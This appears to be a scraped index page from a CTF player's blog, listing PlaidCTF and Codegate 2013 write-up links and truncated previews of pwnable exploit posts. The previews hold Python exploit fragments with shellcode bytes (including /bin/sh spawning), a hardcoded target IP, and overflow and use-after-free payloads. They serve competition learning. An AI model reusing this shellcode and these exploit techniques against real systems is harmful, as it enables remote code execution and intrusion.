CTF

Challenges- http://shell-storm.org/repo/CTF/PlaidCTF-2013/ Write-upPwnable----------------------------------------------------pork - http://pastie.org/7693773- http://pwn3r.tistory.com/entry/Plaid-CTF-2013-pork- http://bases-hacking.org/pork-pctf2013.html- http://www.bases-hacking.org/pork-pctf2013.html ropsaurusrex- http://hackerschool.org/temp/pctf2013/ropasaurusrex_exp.py- http://codezen.fr/2..

Category : Pwnables Summary : simple remote buffer overflow Exploit#!/usr/bin/python from socket import *from struct import pack HOST = "184.72.73.160"PORT = 33227 shellcode_loader= "\x33\xc0\x33\xd2\x31\xdb\x42\xc1\xe2\x08\x43\x43\x43\x43\x04\x03\x54\x59\x81\xc1\x10\xfe\xff\xff\xcd\x80\x3c\x02\x7e\x02\xff\xe1\x31\xc0\x40\x89\xc3\xcd\x80"# read(4, buf, 0x100) -> buf();SHELLCODE = "\x31\xdb\xf7\x..

Category : Pwnables Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass Exploit#!/usr/bin/python import sysfrom struct import pack show= lambda : sys.stdout.write("1\n")add = lambda title, url: sys.stdout.write("2\n"+title+"\n"+url+"\n")modify= lambda num, title, url: sys.stdout.write("3\n"+"1\n"+num+"\n"+title+"\n"+url+"\n")delete = lambda num: sys.stdout.write("4\n"+"1\n"+n..

Category : Pwnables Summary : use-after-free, using uninitialized function pointer Exploit#!/usr/bin/python import sysfrom struct import pack write = lambda author, title, content: sys.stdout.write("1\n"+author+"\n"+title+"\n"+content+"\n")read = lambda idx: sys.stdout.write("2\n"+str(idx)+"\n") delete = lambda: sys.stdout.write("1\n")modify = lambda author, title: sys.stdout.write("2\n"+author+..

Category : Pwnables Summary : arbitrary memory overwrite, vtable Exploit#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = ""payload += "-4\n"payload += "\xe4\x91\x04\x08"payload += "\xe8\x91\x04\x08"payload += "\x90"*0x3..

Category : Pwnables Summary : simple stack-based remote buffer overflow Exploit#!/usr/bin/python from socket import *from struct import pack p = lambda x : pack("

이번 2013년 Codegate 2013 CTF 예선전에 출제됬던 pwnable분야 문제들의 Exploit 및 Solution입니다. Vuln100 : Not yetVuln200 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-200Vuln300 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-300Vuln400 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-400Vuln500 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-500

고려대학교 워룸에서 진행된 BOB 1기의 모의 사이버전에 출제했던 문제입니다. 모의 사이버전 중 점령전 문제로 설정되어 진행되었는데, 대체로 점령전 참여율이 저조했습니다 ㅋㅋㅋ 제일 세팅기간 길었던 부분인데 ㅜㅜ 모의 사이버전 기간이 짧은걸 고려해 대체로 크기가 작게 출제해서 컨셉을 못살린것 같아 살짝 아쉽긴 하네요ㅋㅋ 암튼 재밌으셨길!------------------------------------------------------------------------------------------------------------------------------------------- Category : Pwnable Summary : 1byte overflow, Bypass stack canary with..